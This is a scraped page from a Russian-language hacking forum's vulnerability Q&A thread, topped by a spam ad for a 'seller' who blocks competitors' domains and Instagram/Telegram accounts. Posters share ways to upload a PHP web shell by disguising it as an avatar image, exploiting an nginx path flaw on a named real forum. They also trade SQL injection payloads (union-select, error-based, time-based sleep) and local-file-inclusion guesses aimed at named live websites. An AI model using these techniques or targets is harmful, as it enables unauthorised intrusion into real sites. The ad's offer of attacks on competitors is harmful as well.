УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2147 из 2438

2147

Опции темы

Поиск в этой теме

Опции просмотра

#21461

17.10.2012, 00:10

seozone

Guest

Сообщений: n/a

Провел на форуме:
10928

Репутация: 0

Цитата:

Сообщение от Sat-hacker

Sat-hacker said:
Можете подробней как в аватар добавить shellcod и как проинклудить?
Спасибо.

Вот держи архив, там картинки в форматах .gif,png,jpg

http://www.sendspace.com/file/xe1r2f

#21462

17.10.2012, 00:19

eclipse92

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: -11

Цитата:

Сообщение от seozone

seozone said:
Да тут можно залить шелл без админки, через ngnix http://forum.simix.ru/favicon.ico/.php вот тут бага
создаёшь профиль на форуме заливаешь этот аватар

Код:

Code:
http://www.sendspace.com/file/f6xbz8

и открываешь ссылку на картинку site.ru/papka/photo.gif и дописываешь /.php Т.е site.ru/papka/photo.gif/.php

Спасибо, а что с правами делать? ну всмысле, тут не всё правится

#21463

17.10.2012, 00:25

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

[offtop]Ребят, а попробовать самим все поискать, разве сложно? Устроили тут чат какой-то...[/offtop]

to eclipse92 Для Вас отдельная тема существует!

Повышение прав [задай вопрос - получи ответ]

#21464

17.10.2012, 00:27

OxoTnik

Guest

Сообщений: n/a

Провел на форуме:
290351

Репутация: 173

Нет скули

Цитата:

Сообщение от None

?view=searched&search=1
'
&page=5&id=1

Есть скуля

Цитата:

Сообщение от None

?view=searched&search=
'
1&page=5&id=1

ответ

Цитата:

Сообщение от None

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1

На запросы

Цитата:

Сообщение от None

?view=searched&search=1
+order+by+123--
+&page=5&id=1
и
?view=searched&search=1
'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='
1&page=5&id=1

нет никакой реакций

что ещё попробовать можно?

#21465

17.10.2012, 00:35

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

to OxoTnik

У Вас инъекция в SELECT * FROM table_name WHERE column_name = 'bla_bla' LIMIT [SQLINJ]-10,10

Думая здесь ничего не поможет!

#21466

17.10.2012, 07:49

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от OxoTnik

OxoTnik said:
что ещё попробовать можно?

?view=searched&search=-10,10+union+select+x+--+&page=5&id=1

#21467

17.10.2012, 16:08

MaxFast

Guest

Сообщений: n/a

Провел на форуме:
178623

Репутация: 94

http://kvostava.us/modules/boonex/poll/index.php?aModule=

Вроде LFI, но ничего не получается.

#21468

17.10.2012, 17:06

full_hate

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 0

Задание по SQL inj

В универе дали задание раскрутить скули всего 10 тасков, не получается решить последний там time-based и просто форма, помогите пожалуйста https://alexbers.com/sql/lastlevel10.php

#21469

18.10.2012, 06:59

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от full_hate

full_hate said:
В универе дали задание раскрутить скули всего 10 тасков, не получается решить последний там time-based и просто форма, помогите пожалуйста https://alexbers.com/sql/lastlevel10.php

Код:

Code:
if ((substring((@@version),1,1)=5),sleep(0),sleep(3))

Дальше запрос сам составишь?)

#21470

18.10.2012, 16:00

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

Цитата:

Сообщение от MaxFast

MaxFast said:
http://kvostava.us/modules/boonex/poll/index.php?aModule=
Вроде LFI, но ничего не получается.

Кто сказал, что LFI? Внимательно читаем ерроры и варнинги. Во первых, судя по тому, что при подстановке в GET запрос переменной из ошибки вида - http://kvostava.us/modules/boonex/poll/index.php?aModule не дает никакой реакции. Вывод - либо определяется локально в скриптах, либо в реквесте используется другая переменная , а в скриптах переопределяется на $aModule. В любом случае, неопределенная константа BX_DIRECTORY_PATH_MODULES - в пути к файлу не даст провести операцию. Более того, require_once(BX_DIRECTORY_PATH_MODULESclasses/View.php) явно повествует о том, что вследствии того , что она самая константа неопределена - скрипт не может подключить - константа/classes/View.php. Явно, что модуль, коим данный файл и является, использует константы и прочие данные определенные уровнем выше.

Страница 2147 из 2438

2147

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход